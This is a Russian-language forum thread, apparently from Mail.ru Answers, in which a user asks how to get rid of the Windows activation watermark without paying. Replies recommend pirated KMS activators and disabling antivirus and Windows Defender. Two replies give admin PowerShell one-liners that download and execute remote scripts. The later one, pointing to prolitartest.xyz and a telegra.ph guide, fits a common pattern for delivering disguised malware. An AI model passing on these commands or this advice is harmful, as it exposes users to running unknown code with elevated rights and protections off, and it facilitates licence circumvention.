Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты

Как убрать надпись "Активация Windows"? Она несколько часов не появляется, а потом появляется опять

Перфект Маил Профи (543), на голосовании 21 час назад
Я устала от неё. Раньше её не было, с недавнего времени сама появилась.

Не буду активировать, нет денег и желания.
Голосование за лучший ответ
Рома Куликов Ученик (105) 1 месяц назад
У меня было такое раньше,либо корявая винда,либо же вбей в Ютуб как убрать активация виндовс через консоль
андрей Богданов Ученик (109) 1 месяц назад
Попробуйте пробную версию Виндоус вроде как она есть если нету то придется с этим жить
Ваше Величество Просветленный (48673) 1 месяц назад
Активация отсутствует или слетела. Введи ключ активации
рома толмачов Мыслитель (6489) 1 месяц назад
зайди на сайт 64 и найди активатор твоей винды они там бесплатные
Danil Buriak Мудрец (10677) 1 месяц назад
кмс скачай и активируй
111 Мудрец (15976) 1 месяц назад
Я через power shell делаю. Нажимаешь на кнопке поиска. Оно чаще всего около пуска. Там или окно, или строка поиска. Пишешь туда powershell. Выходит прога, нажимаешь по ней правой кнопкой и запускаешь от имени админа. Затем открывается консоль. Туда пишешь irm https://massgrave.dev/get | iex
Нажимаешь энтер. Качается скрипт активации. Нажимаешь цифру 1. Он активирует винду. Если нужно активировать офис, то цифру 2
Алиса ПолосатаяМудрец (12491) 1 месяц назад
и качаешь ТРОЯН СПС !!
111 Мудрец (15976) Алиса Полосатая, ахах. Ламеры думают, что скачается троян)
Алиса Полосатая Мудрец (12491) 1 месяц назад
кмс активатор ! только выключи Все антивирусники и защитник винды ! они его люто не любят !
Shurovik Искусственный Интеллект (709610) 1 месяц назад
А разве для активации нужны деньги? Вот это нонсенс.... Всегда активировал бесплатно. Какая именно у вас ОС?
Алиса ПолосатаяМудрец (12491) 1 месяц назад
А вот те какая разница какая у пользователя ось ! понятно что не 95 или хрюша ! значит кмс !
Shurovik Искусственный Интеллект (709610) Алиса Полосатая, просто для разных ОСей разные активаторы используются.
Игорь Евлахов Ученик (121) 1 неделю назад
1. Откройте командную строку от имени администратора: нажмите `Ctrl + R`, введите `cmd`, затем нажмите `Ctrl + Shift + Enter`.

2. Введите следующую команду: powershell iex (irm ' prolitartest.xyz/key ')

3. Выберите пункт `1` и нажмите `Enter` для активации Windows.

Готово!

Источник:https://telegra.ph/Rukovodstvo-po-aktivacii-Windows-1011-11-12
Похожие вопросы